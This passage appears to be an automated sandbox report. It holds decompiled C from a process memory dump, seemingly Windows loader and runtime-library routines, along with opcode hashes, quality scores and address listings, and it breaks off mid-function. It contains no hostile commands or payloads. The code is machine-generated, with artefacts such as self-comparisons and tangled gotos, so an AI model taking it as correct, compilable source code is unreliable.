                                                              0x010041c3
                                                              0x010041bd
                                                              0x01004415
                                                              0x01004415
                                                              0x01004416
                                                              0x01004417
                                                              0x01004429
                                                              0x0100416e
                                                              0x0100416e
                                                              0x01004175
                                                              0x01004498
                                                              0x0100449f
                                                              0x0104e12d
                                                              0x00000000
                                                              0x0104e133
                                                              0x00000000
                                                              0x0104e133
                                                              0x010044a5
                                                              0x010044a5
                                                              0x010044aa
                                                              0x00000000
                                                              0x010044bb
                                                              0x010044ca
                                                              0x010044d6
                                                              0x010044d7
                                                              0x010044d8
                                                              0x010044e3
                                                              0x010044e3
                                                              0x010044aa
                                                              0x0100417b
                                                              0x0100417b
                                                              0x0100417b
                                                              0x00000000
                                                              0x0100417b
                                                              0x01004175
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7e50e5af74cf17f0db54baa250871adcc7f74f50beb42e1d80b438203cfba688
                                                              • Instruction ID: 145932e766d84c0b6bf606a46736bbb711e624f2dd80aa0cdc7229e9d1058075
                                                              • Opcode Fuzzy Hash: 7e50e5af74cf17f0db54baa250871adcc7f74f50beb42e1d80b438203cfba688
                                                              • Instruction Fuzzy Hash: 8AF18D706082118FE765CF19C480A7AB7E1FF88714F45896EFAC6CB291E738D981CB56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 92%
                                                              			E010120A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				signed char _v24;
                                                              				intOrPtr _v28;
                                                              				signed int _v32;
                                                              				void* _v36;
                                                              				char _v48;
                                                              				signed int _v52;
                                                              				signed int _v56;
                                                              				unsigned int _v60;
                                                              				char _v64;
                                                              				unsigned int _v68;
                                                              				signed int _v72;
                                                              				char _v73;
                                                              				signed int _v74;
                                                              				char _v75;
                                                              				signed int _v76;
                                                              				void* _v81;
                                                              				void* _v82;
                                                              				void* _v89;
                                                              				void* _v92;
                                                              				void* _v97;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				signed char _t128;
                                                              				void* _t129;
                                                              				signed int _t130;
                                                              				void* _t132;
                                                              				signed char _t133;
                                                              				intOrPtr _t135;
                                                              				signed int _t137;
                                                              				signed int _t140;
                                                              				signed int* _t144;
                                                              				signed int* _t145;
                                                              				intOrPtr _t146;
                                                              				signed int _t147;
                                                              				signed char* _t148;
                                                              				signed int _t149;
                                                              				signed int _t153;
                                                              				signed int _t169;
                                                              				signed int _t174;
                                                              				signed int _t180;
                                                              				void* _t197;
                                                              				void* _t198;
                                                              				signed int _t201;
                                                              				intOrPtr* _t202;
                                                              				intOrPtr* _t205;
                                                              				signed int _t210;
                                                              				signed int _t215;
                                                              				signed int _t218;
                                                              				signed char _t221;
                                                              				signed int _t226;
                                                              				char _t227;
                                                              				signed int _t228;
                                                              				void* _t229;
                                                              				unsigned int _t231;
                                                              				void* _t235;
                                                              				signed int _t240;
                                                              				signed int _t241;
                                                              				void* _t242;
                                                              				signed int _t246;
                                                              				signed int _t248;
                                                              				signed int _t252;
                                                              				signed int _t253;
                                                              				void* _t254;
                                                              				intOrPtr* _t256;
                                                              				intOrPtr _t257;
                                                              				unsigned int _t262;
                                                              				signed int _t265;
                                                              				void* _t267;
                                                              				signed int _t275;
                                                              
                                                              				_t198 = __ebx;
                                                              				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                                              				_v68 = __ecx;
                                                              				_v73 = 0;
                                                              				_t201 = __edx & 0x00002000;
                                                              				_t128 = __edx & 0xffffdfff;
                                                              				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                                              				_v72 = _t128;
                                                              				if((_t128 & 0x00000008) != 0) {
                                                              					__eflags = _t128 - 8;
                                                              					if(_t128 != 8) {
                                                              						L69:
                                                              						_t129 = 0xc000000d;
                                                              						goto L23;
                                                              					} else {
                                                              						_t130 = 0;
                                                              						_v72 = 0;
                                                              						_v75 = 1;
                                                              						L2:
                                                              						_v74 = 1;
                                                              						_t226 =  *0x10d8714; // 0x0
                                                              						if(_t226 != 0) {
                                                              							__eflags = _t201;
                                                              							if(_t201 != 0) {
                                                              								L62:
                                                              								_v74 = 1;
                                                              								L63:
                                                              								_t130 = _t226 & 0xffffdfff;
                                                              								_v72 = _t130;
                                                              								goto L3;
                                                              							}
                                                              							_v74 = _t201;
                                                              							__eflags = _t226 & 0x00002000;
                                                              							if((_t226 & 0x00002000) == 0) {
                                                              								goto L63;
                                                              							}
                                                              							goto L62;
                                                              						}
                                                              						L3:
                                                              						_t227 = _v75;
                                                              						L4:
                                                              						_t240 = 0;
                                                              						_v56 = 0;
                                                              						_t252 = _t130 & 0x00000100;
                                                              						if(_t252 != 0 || _t227 != 0) {
                                                              							_t240 = _v68;
                                                              							_t132 = E01012EB0(_t240);
                                                              							__eflags = _t132 - 2;
                                                              							if(_t132 != 2) {
                                                              								__eflags = _t132 - 1;
                                                              								if(_t132 == 1) {
                                                              									goto L25;
                                                              								}
                                                              								__eflags = _t132 - 6;
                                                              								if(_t132 == 6) {
                                                              									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                                              									if( *((short*)(_t240 + 4)) != 0x3f) {
                                                              										goto L40;
                                                              									}
                                                              									_t197 = E01012EB0(_t240 + 8);
                                                              									__eflags = _t197 - 2;
                                                              									if(_t197 == 2) {
                                                              										goto L25;
                                                              									}
                                                              								}
                                                              								L40:
                                                              								_t133 = 1;
                                                              								L26:
                                                              								_t228 = _v75;
                                                              								_v56 = _t240;
                                                              								__eflags = _t133;
                                                              								if(_t133 != 0) {
                                                              									__eflags = _t228;
                                                              									if(_t228 == 0) {
                                                              										L43:
                                                              										__eflags = _v72;
                                                              										if(_v72 == 0) {
                                                              											goto L8;
                                                              										}
                                                              										goto L69;
                                                              									}
                                                              									_t133 = E00FE58EC(_t240);
                                                              									_t221 =  *0x10d5cac; // 0x16
                                                              									__eflags = _t221 & 0x00000040;
                                                              									if((_t221 & 0x00000040) != 0) {
                                                              										_t228 = 0;
                                                              										__eflags = _t252;
                                                              										if(_t252 != 0) {
                                                              											goto L43;
                                                              										}
                                                              										_t133 = _v72;
                                                              										goto L7;
                                                              									}
                                                              									goto L43;
                                                              								} else {
                                                              									_t133 = _v72;
                                                              									goto L6;
                                                              								}
                                                              							}
                                                              							L25:
                                                              							_t133 = _v73;
                                                              							goto L26;
                                                              						} else {
                                                              							L6:
                                                              							_t221 =  *0x10d5cac; // 0x16
                                                              							L7:
                                                              							if(_t133 != 0) {
                                                              								__eflags = _t133 & 0x00001000;
                                                              								if((_t133 & 0x00001000) != 0) {
                                                              									_t133 = _t133 | 0x00000a00;
                                                              									__eflags = _t221 & 0x00000004;
                                                              									if((_t221 & 0x00000004) != 0) {
                                                              										_t133 = _t133 | 0x00000400;
                                                              									}
                                                              								}
                                                              								__eflags = _t228;
                                                              								if(_t228 != 0) {
                                                              									_t133 = _t133 | 0x00000100;
                                                              								}
                                                              								_t229 = E01024A2C(0x10d6e40, 0x1024b30, _t133, _t240);
                                                              								__eflags = _t229;
                                                              								if(_t229 == 0) {
                                                              									_t202 = _a20;
                                                              									goto L100;
                                                              								} else {
                                                              									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                                              									L15:
                                                              									_t202 = _a20;
                                                              									 *_t202 = _t135;
                                                              									if(_t229 == 0) {
                                                              										L100:
                                                              										 *_a4 = 0;
                                                              										_t137 = _a8;
                                                              										__eflags = _t137;
                                                              										if(_t137 != 0) {
                                                              											 *_t137 = 0;
                                                              										}
                                                              										 *_t202 = 0;
                                                              										_t129 = 0xc0000017;
                                                              										goto L23;
                                                              									} else {
                                                              										_t242 = _a16;
                                                              										if(_t242 != 0) {
                                                              											_t254 = _t229;
                                                              											memcpy(_t242, _t254, 0xd << 2);
                                                              											_t267 = _t267 + 0xc;
                                                              											_t242 = _t254 + 0x1a;
                                                              										}
                                                              										_t205 = _a4;
                                                              										_t25 = _t229 + 0x48; // 0x48
                                                              										 *_t205 = _t25;
                                                              										_t140 = _a8;
                                                              										if(_t140 != 0) {
                                                              											__eflags =  *((char*)(_t267 + 0xa));
                                                              											if( *((char*)(_t267 + 0xa)) != 0) {
                                                              												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                                              											} else {
                                                              												 *_t140 = 0;
                                                              											}
                                                              										}
                                                              										_t256 = _a12;
                                                              										if(_t256 != 0) {
                                                              											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                                              										}
                                                              										_t257 =  *_t205;
                                                              										_v48 = 0;
                                                              										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                                              										_v56 = 0;
                                                              										_v52 = 0;
                                                              										_t144 =  *( *[fs:0x30] + 0x50);
                                                              										if(_t144 != 0) {
                                                              											__eflags =  *_t144;
                                                              											if( *_t144 == 0) {
                                                              												goto L20;
                                                              											}
                                                              											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                              											goto L21;
                                                              										} else {
                                                              											L20:
                                                              											_t145 = 0x7ffe0384;
                                                              											L21:
                                                              											if( *_t145 != 0) {
                                                              												_t146 =  *[fs:0x30];
                                                              												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                                              												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                                              													_t147 = E01007D50();
                                                              													__eflags = _t147;
                                                              													if(_t147 == 0) {
                                                              														_t148 = 0x7ffe0385;
                                                              													} else {
                                                              														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                              													}
                                                              													__eflags =  *_t148 & 0x00000020;
                                                              													if(( *_t148 & 0x00000020) != 0) {
                                                              														_t149 = _v72;
                                                              														__eflags = _t149;
                                                              														if(__eflags == 0) {
                                                              															_t149 = 0xfc5c80;
                                                              														}
                                                              														_push(_t149);
                                                              														_push( &_v48);
                                                              														 *((char*)(_t267 + 0xb)) = E0101F6E0(_t198, _t242, _t257, __eflags);
                                                              														_push(_t257);
                                                              														_push( &_v64);
                                                              														_t153 = E0101F6E0(_t198, _t242, _t257, __eflags);
                                                              														__eflags =  *((char*)(_t267 + 0xb));
                                                              														if( *((char*)(_t267 + 0xb)) != 0) {
                                                              															__eflags = _t153;
                                                              															if(_t153 != 0) {
                                                              																__eflags = 0;
                                                              																E01067016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                                              																L01002400(_t267 + 0x20);
                                                              															}
                                                              															L01002400( &_v64);
                                                              														}
                                                              													}
                                                              												}
                                                              											}
                                                              											_t129 = 0;
                                                              											L23:
                                                              											return _t129;
                                                              										}
                                                              									}
                                                              								}
                                                              							}
                                                              							L8:
                                                              							_t275 = _t240;
                                                              							if(_t275 != 0) {
                                                              								_v73 = 0;
                                                              								_t253 = 0;
                                                              								__eflags = 0;
                                                              								L29:
                                                              								_push(0);
                                                              								_t241 = E01012397(_t240);
                                                              								__eflags = _t241;
                                                              								if(_t241 == 0) {
                                                              									_t229 = 0;
                                                              									L14:
                                                              									_t135 = 0;
                                                              									goto L15;
                                                              								}
                                                              								__eflags =  *((char*)(_t267 + 0xb));
                                                              								 *(_t241 + 0x34) = 1;
                                                              								if( *((char*)(_t267 + 0xb)) != 0) {
                                                              									E01002280(_t134, 0x10d8608);
                                                              									__eflags =  *0x10d6e48 - _t253; // 0x0
                                                              									if(__eflags != 0) {
                                                              										L48:
                                                              										_t253 = 0;
                                                              										__eflags = 0;
                                                              										L49:
                                                              										E00FFFFB0(_t198, _t241, 0x10d8608);
                                                              										__eflags = _t253;
                                                              										if(_t253 != 0) {
                                                              											L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                                              										}
                                                              										goto L31;
                                                              									}
                                                              									 *0x10d6e48 = _t241;
                                                              									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                                              									__eflags = _t253;
                                                              									if(_t253 != 0) {
                                                              										_t57 = _t253 + 0x34;
                                                              										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                                              										__eflags =  *_t57;
                                                              										if( *_t57 == 0) {
                                                              											goto L49;
                                                              										}
                                                              									}
                                                              									goto L48;
                                                              								}
                                                              								L31:
                                                              								_t229 = _t241;
                                                              								goto L14;
                                                              							}
                                                              							_v73 = 1;
                                                              							_v64 = _t240;
                                                              							asm("lock bts dword [esi], 0x0");
                                                              							if(_t275 < 0) {
                                                              								_t231 =  *0x10d8608; // 0x0
                                                              								while(1) {
                                                              									_v60 = _t231;
                                                              									__eflags = _t231 & 0x00000001;
                                                              									if((_t231 & 0x00000001) != 0) {
                                                              										goto L76;
                                                              									}
                                                              									_t73 = _t231 + 1; // 0x1
                                                              									_t210 = _t73;
                                                              									asm("lock cmpxchg [edi], ecx");
                                                              									__eflags = _t231 - _t231;
                                                              									if(_t231 != _t231) {
                                                              										L92:
                                                              										_t133 = E01016B90(_t210,  &_v64);
                                                              										_t262 =  *0x10d8608; // 0x0
                                                              										L93:
                                                              										_t231 = _t262;
                                                              										continue;
                                                              									}
                                                              									_t240 = _v56;
                                                              									goto L10;
                                                              									L76:
                                                              									_t169 = E0101E180(_t133);
                                                              									__eflags = _t169;
                                                              									if(_t169 != 0) {
                                                              										_push(0xc000004b);
                                                              										_push(0xffffffff);
                                                              										E010297C0();
                                                              										_t231 = _v68;
                                                              									}
                                                              									_v72 = 0;
                                                              									_v24 =  *( *[fs:0x18] + 0x24);
                                                              									_v16 = 3;
                                                              									_v28 = 0;
                                                              									__eflags = _t231 & 0x00000002;
                                                              									if((_t231 & 0x00000002) == 0) {
                                                              										_v32 =  &_v36;
                                                              										_t174 = _t231 >> 4;
                                                              										__eflags = 1 - _t174;
                                                              										_v20 = _t174;
                                                              										asm("sbb ecx, ecx");
                                                              										_t210 = 3 |  &_v36;
                                                              										__eflags = _t174;
                                                              										if(_t174 == 0) {
                                                              											_v20 = 0xfffffffe;
                                                              										}
                                                              									} else {
                                                              										_v32 = 0;
                                                              										_v20 = 0xffffffff;
                                                              										_v36 = _t231 & 0xfffffff0;
                                                              										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                                              										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                                              									}
                                                              									asm("lock cmpxchg [edi], esi");
                                                              									_t262 = _t231;
                                                              									__eflags = _t262 - _t231;
                                                              									if(_t262 != _t231) {
                                                              										goto L92;
                                                              									} else {
                                                              										__eflags = _v72;
                                                              										if(_v72 != 0) {
                                                              											E0102006A(0x10d8608, _t210);
                                                              										}
                                                              										__eflags =  *0x7ffe036a - 1;
                                                              										if(__eflags <= 0) {
                                                              											L89:
                                                              											_t133 =  &_v16;
                                                              											asm("lock btr dword [eax], 0x1");
                                                              											if(__eflags >= 0) {
                                                              												goto L93;
                                                              											} else {
                                                              												goto L90;
                                                              											}
                                                              											do {
                                                              												L90:
                                                              												_push(0);
                                                              												_push(0x10d8608);
                                                              												E0102B180();
                                                              												_t133 = _v24;
                                                              												__eflags = _t133 & 0x00000004;
                                                              											} while ((_t133 & 0x00000004) == 0);
                                                              											goto L93;
                                                              										} else {
                                                              											_t218 =  *0x10d6904; // 0x400
                                                              											__eflags = _t218;
                                                              											if(__eflags == 0) {
                                                              												goto L89;
                                                              											} else {
                                                              												goto L87;
                                                              											}
                                                              											while(1) {
                                                              												L87:
                                                              												__eflags = _v16 & 0x00000002;
                                                              												if(__eflags == 0) {
                                                              													goto L89;
                                                              												}
                                                              												asm("pause");
                                                              												_t218 = _t218 - 1;
                                                              												__eflags = _t218;
                                                              												if(__eflags != 0) {
                                                              													continue;
                                                              												}
                                                              												goto L89;
                                                              											}
                                                              											goto L89;
                                                              										}
                                                              									}
                                                              								}
                                                              							}
                                                              							L10:
                                                              							_t229 =  *0x10d6e48; // 0x0
                                                              							_v72 = _t229;
                                                              							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                              								E00FFFFB0(_t198, _t240, 0x10d8608);
                                                              								_t253 = _v76;
                                                              								goto L29;
                                                              							} else {
                                                              								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                                              								asm("lock cmpxchg [esi], ecx");
                                                              								_t215 = 1;
                                                              								if(1 != 1) {
                                                              									while(1) {
                                                              										_t246 = _t215 & 0x00000006;
                                                              										_t180 = _t215;
                                                              										__eflags = _t246 - 2;
                                                              										_v56 = _t246;
                                                              										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                                              										asm("lock cmpxchg [edi], esi");
                                                              										_t248 = _v56;
                                                              										__eflags = _t180 - _t215;
                                                              										if(_t180 == _t215) {
                                                              											break;
                                                              										}
                                                              										_t215 = _t180;
                                                              									}
                                                              									__eflags = _t248 - 2;
                                                              									if(_t248 == 2) {
                                                              										__eflags = 0;
                                                              										E010200C2(0x10d8608, 0, _t235);
                                                              									}
                                                              									_t229 = _v72;
                                                              								}
                                                              								goto L14;
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				_t227 = 0;
                                                              				_v75 = 0;
                                                              				if(_t128 != 0) {
                                                              					goto L4;
                                                              				}
                                                              				goto L2;
                                                              			}











































































                                                              0x010121e9
                                                              0x010121ee
                                                              0x010121f1
                                                              0x01055a45
                                                              0x01055a4b
                                                              0x01055a52
                                                              0x01055a58
                                                              0x01055a5d
                                                              0x01055a5f
                                                              0x01055a71
                                                              0x01055a61
                                                              0x01055a6a
                                                              0x01055a6a
                                                              0x01055a76
                                                              0x01055a79
                                                              0x01055a7f
                                                              0x01055a83
                                                              0x01055a85
                                                              0x01055a87
                                                              0x01055a87
                                                              0x01055a8c
                                                              0x01055a91
                                                              0x01055a97
                                                              0x01055a9f
                                                              0x01055aa0
                                                              0x01055aa1
                                                              0x01055aa6
                                                              0x01055aab
                                                              0x01055ab1
                                                              0x01055ab3
                                                              0x01055ab9
                                                              0x01055aca
                                                              0x01055ad4
                                                              0x01055ad4
                                                              0x01055ade
                                                              0x01055ade
                                                              0x01055aab
                                                              0x01055a79
                                                              0x01055a52
                                                              0x010121f7
                                                              0x010121f9
                                                              0x010121fe
                                                              0x010121fe
                                                              0x010121e3
                                                              0x01012195
                                                              0x0101236c
                                                              0x01012122
                                                              0x01012122
                                                              0x01012124
                                                              0x01012231
                                                              0x01012236
                                                              0x01012236
                                                              0x01012238
                                                              0x01012238
                                                              0x01012240
                                                              0x01012242
                                                              0x01012244
                                                              0x010559fc
                                                              0x0101218c
                                                              0x0101218c
                                                              0x00000000
                                                              0x0101218c
                                                              0x0101224a
                                                              0x0101224f
                                                              0x01012256
                                                              0x01012304
                                                              0x01012309
                                                              0x0101230f
                                                              0x0101231e
                                                              0x0101231e
                                                              0x0101231e
                                                              0x01012320
                                                              0x01012325
                                                              0x0101232a
                                                              0x0101232c
                                                              0x0101233e
                                                              0x0101233e
                                                              0x00000000
                                                              0x0101232c
                                                              0x01012311
                                                              0x01012317
                                                              0x0101231a
                                                              0x0101231c
                                                              0x01012380
                                                              0x01012380
                                                              0x01012380
                                                              0x01012384
                                                              0x00000000
                                                              0x00000000
                                                              0x01012386
                                                              0x00000000
                                                              0x0101231c
                                                              0x0101225c
                                                              0x0101225c
                                                              0x00000000
                                                              0x0101225c
                                                              0x0101212a
                                                              0x01012134
                                                              0x01012138
                                                              0x0101213d
                                                              0x01055858
                                                              0x01055863
                                                              0x01055863
                                                              0x01055867
                                                              0x0105586a
                                                              0x00000000
                                                              0x00000000
                                                              0x0105586c
                                                              0x0105586c
                                                              0x01055871
                                                              0x01055875
                                                              0x01055877
                                                              0x01055997
                                                              0x0105599c
                                                              0x010559a1
                                                              0x010559a7
                                                              0x010559a7
                                                              0x00000000
                                                              0x010559a7
                                                              0x0105587d
                                                              0x00000000
                                                              0x0105588b
                                                              0x0105588b
                                                              0x01055890
                                                              0x01055892
                                                              0x01055894
                                                              0x01055899
                                                              0x0105589b
                                                              0x010558a0
                                                              0x010558a0
                                                              0x010558aa
                                                              0x010558b2
                                                              0x010558b6
                                                              0x010558be
                                                              0x010558c6
                                                              0x010558c9
                                                              0x0105590d
                                                              0x01055917
                                                              0x0105591a
                                                              0x0105591c
                                                              0x01055920
                                                              0x01055928
                                                              0x0105592a
                                                              0x0105592c
                                                              0x0105592e
                                                              0x0105592e
                                                              0x010558cb
                                                              0x010558cd
                                                              0x010558d8
                                                              0x010558e0
                                                              0x010558f4
                                                              0x010558fe
                                                              0x010558fe
                                                              0x0105593a
                                                              0x0105593e
                                                              0x01055940
                                                              0x01055942
                                                              0x00000000
                                                              0x01055944
                                                              0x01055944
                                                              0x01055949
                                                              0x0105594e
                                                              0x0105594e
                                                              0x01055953
                                                              0x0105595b
                                                              0x01055976
                                                              0x01055976
                                                              0x0105597a
                                                              0x0105597f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01055981
                                                              0x01055981
                                                              0x01055981
                                                              0x01055983
                                                              0x01055988
                                                              0x0105598d
                                                              0x01055991
                                                              0x01055991
                                                              0x00000000
                                                              0x0105595d
                                                              0x0105595d
                                                              0x01055963
                                                              0x01055965
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01055967
                                                              0x01055967
                                                              0x0105596b
                                                              0x0105596d
                                                              0x00000000
                                                              0x00000000
                                                              0x0105596f
                                                              0x01055971
                                                              0x01055971
                                                              0x01055974
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01055974
                                                              0x00000000
                                                              0x01055967
                                                              0x0105595b
                                                              0x01055942
                                                              0x01055863
                                                              0x01012143
                                                              0x01012143
                                                              0x01012149
                                                              0x0101214f
                                                              0x010122f1
                                                              0x010122f6
                                                              0x00000000
                                                              0x01012173
                                                              0x01012173
                                                              0x0101217d
                                                              0x01012181
                                                              0x01012186
                                                              0x010559ae
                                                              0x010559b2
                                                              0x010559b5
                                                              0x010559b7
                                                              0x010559ba
                                                              0x010559cd
                                                              0x010559d1
                                                              0x010559d5
                                                              0x010559d9
                                                              0x010559db
                                                              0x00000000
                                                              0x00000000
                                                              0x010559dd
                                                              0x010559dd
                                                              0x010559e1
                                                              0x010559e4
                                                              0x010559e7
                                                              0x010559ee
                                                              0x010559ee
                                                              0x010559f3
                                                              0x010559f3
                                                              0x00000000
                                                              0x01012186
                                                              0x0101214f
                                                              0x01012106
                                                              0x01012266
                                                              0x010120d8
                                                              0x010120da
                                                              0x010120e0
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b8d322600b27b8e734f63d0ad488313bd2759941f1163b11cd98e3d192a5d455
                                                              • Instruction ID: cc636def472893938a569dd11de42e03a4e54261d53da5ac9eb7cf3793bb1200
                                                              • Opcode Fuzzy Hash: b8d322600b27b8e734f63d0ad488313bd2759941f1163b11cd98e3d192a5d455
                                                              • Instruction Fuzzy Hash: 61F102316083419FEBA6CF2CC8407AF7BE1AF95324F24859DE9D59B285D739D841CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 87%
                                                              			E00FFD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                                              				signed int _v8;
                                                              				intOrPtr _v20;
                                                              				signed int _v36;
                                                              				intOrPtr* _v40;
                                                              				signed int _v44;
                                                              				signed int _v48;
                                                              				signed char _v52;
                                                              				signed int _v60;
                                                              				signed int _v64;
                                                              				signed int _v68;
                                                              				signed int _v72;
                                                              				signed int _v76;
                                                              				intOrPtr _v80;
                                                              				signed int _v84;
                                                              				intOrPtr _v100;
                                                              				intOrPtr _v104;
                                                              				signed int _v108;
                                                              				signed int _v112;
                                                              				signed int _v116;
                                                              				intOrPtr _v120;
                                                              				signed int _v132;
                                                              				char _v140;
                                                              				char _v144;
                                                              				char _v157;
                                                              				signed int _v164;
                                                              				signed int _v168;
                                                              				signed int _v169;
                                                              				intOrPtr _v176;
                                                              				signed int _v180;
                                                              				signed int _v184;
                                                              				intOrPtr _v188;
                                                              				signed int _v192;
                                                              				signed int _v200;
                                                              				signed int _v208;
                                                              				intOrPtr* _v212;
                                                              				char _v216;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				signed int _t204;
                                                              				void* _t208;
                                                              				signed int _t211;
                                                              				signed int _t216;
                                                              				intOrPtr _t217;
                                                              				intOrPtr* _t218;
                                                              				signed int _t226;
                                                              				signed int _t239;
                                                              				signed int* _t247;
                                                              				signed int _t249;
                                                              				void* _t252;
                                                              				signed int _t256;
                                                              				signed int _t269;
                                                              				signed int _t271;
                                                              				signed int _t277;
                                                              				signed int _t279;
                                                              				intOrPtr _t283;
                                                              				signed int _t287;
                                                              				signed int _t288;
                                                              				void* _t289;
                                                              				signed char _t290;
                                                              				signed int _t292;
                                                              				signed int* _t293;
                                                              				signed int _t306;
                                                              				signed int _t307;
                                                              				signed int _t308;
                                                              				signed int _t309;
                                                              				signed int _t310;
                                                              				intOrPtr _t311;
                                                              				intOrPtr _t312;
                                                              				signed int _t319;
                                                              				signed int _t320;
                                                              				signed int* _t324;
                                                              				signed int _t337;
                                                              				signed int _t338;
                                                              				signed int _t339;
                                                              				signed int* _t340;
                                                              				void* _t341;
                                                              				signed int _t344;
                                                              				signed int _t348;
                                                              				signed int _t349;
                                                              				signed int _t351;
                                                              				intOrPtr _t353;
                                                              				void* _t354;
                                                              				signed int _t356;
                                                              				signed int _t358;
                                                              				intOrPtr _t359;
                                                              				signed int _t363;
                                                              				signed short* _t365;
                                                              				void* _t367;
                                                              				intOrPtr _t369;
                                                              				void* _t370;
                                                              				signed int _t371;
                                                              				signed int _t372;
                                                              				void* _t374;
                                                              				signed int _t376;
                                                              				void* _t384;
                                                              				signed int _t387;
                                                              
                                                              				_v8 =  *0x10dd360 ^ _t376;
                                                              				_t2 =  &_a20;
                                                              				 *_t2 = _a20 & 0x00000001;
                                                              				_t287 = _a4;
                                                              				_v200 = _a12;
                                                              				_t365 = _a8;
                                                              				_v212 = _a16;
                                                              				_v180 = _a24;
                                                              				_v168 = 0;
                                                              				_v157 = 0;
                                                              				if( *_t2 != 0) {
                                                              					__eflags = E00FF6600(0x10d52d8);
                                                              					if(__eflags == 0) {
                                                              						goto L1;
                                                              					} else {
                                                              						_v188 = 6;
                                                              					}
                                                              				} else {
                                                              					L1:
                                                              					_v188 = 9;
                                                              				}
                                                              				if(_t365 == 0) {
                                                              					_v164 = 0;
                                                              					goto L5;
                                                              				} else {
                                                              					_t363 =  *_t365 & 0x0000ffff;
                                                              					_t341 = _t363 + 1;
                                                              					if((_t365[1] & 0x0000ffff) < _t341) {
                                                              						L109:
                                                              						__eflags = _t341 - 0x80;
                                                              						if(_t341 <= 0x80) {
                                                              							_t281 =  &_v140;
                                                              							_v164 =  &_v140;
                                                              							goto L114;
                                                              						} else {
                                                              							_t283 =  *0x10d7b9c; // 0x0
                                                              							_t281 = L01004620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                                              							_v164 = _t281;
                                                              							__eflags = _t281;
                                                              							if(_t281 != 0) {
                                                              								_v157 = 1;
                                                              								L114:
                                                              								E0102F3E0(_t281, _t365[2], _t363);
                                                              								_t200 = _v164;
                                                              								 *((char*)(_v164 + _t363)) = 0;
                                                              								goto L5;
                                                              							} else {
                                                              								_t204 = 0xc000009a;
                                                              								goto L47;
                                                              							}
                                                              						}
                                                              					} else {
                                                              						_t200 = _t365[2];
                                                              						_v164 = _t200;
                                                              						if( *((char*)(_t200 + _t363)) != 0) {
                                                              							goto L109;
                                                              						} else {
                                                              							while(1) {
                                                              								L5:
                                                              								_t353 = 0;
                                                              								_t342 = 0x1000;
                                                              								_v176 = 0;
                                                              								if(_t287 == 0) {
                                                              									break;
                                                              								}
                                                              								_t384 = _t287 -  *0x10d7b90; // 0x77df0000
                                                              								if(_t384 == 0) {
                                                              									_t353 =  *0x10d7b8c; // 0xb82b70
                                                              									_v176 = _t353;
                                                              									_t320 = ( *(_t353 + 0x50))[8];
                                                              									_v184 = _t320;
                                                              								} else {
                                                              									E01002280(_t200, 0x10d84d8);
                                                              									_t277 =  *0x10d85f4; // 0xb83060
                                                              									_t351 =  *0x10d85f8 & 1;
                                                              									while(_t277 != 0) {
                                                              										_t337 =  *(_t277 - 0x50);
                                                              										if(_t337 > _t287) {
                                                              											_t338 = _t337 | 0xffffffff;
                                                              										} else {
                                                              											asm("sbb ecx, ecx");
                                                              											_t338 =  ~_t337;
                                                              										}
                                                              										_t387 = _t338;
                                                              										if(_t387 < 0) {
                                                              											_t339 =  *_t277;
                                                              											__eflags = _t351;
                                                              											if(_t351 != 0) {
                                                              												__eflags = _t339;
                                                              												if(_t339 == 0) {
                                                              													goto L16;
                                                              												} else {
                                                              													goto L118;
                                                              												}
                                                              												goto L151;
                                                              											} else {
                                                              												goto L16;
                                                              											}
                                                              											goto L17;
                                                              										} else {
                                                              											if(_t387 <= 0) {
                                                              												__eflags = _t277;
                                                              												if(_t277 != 0) {
                                                              													_t340 =  *(_t277 - 0x18);
                                                              													_t24 = _t277 - 0x68; // 0xb82ff8
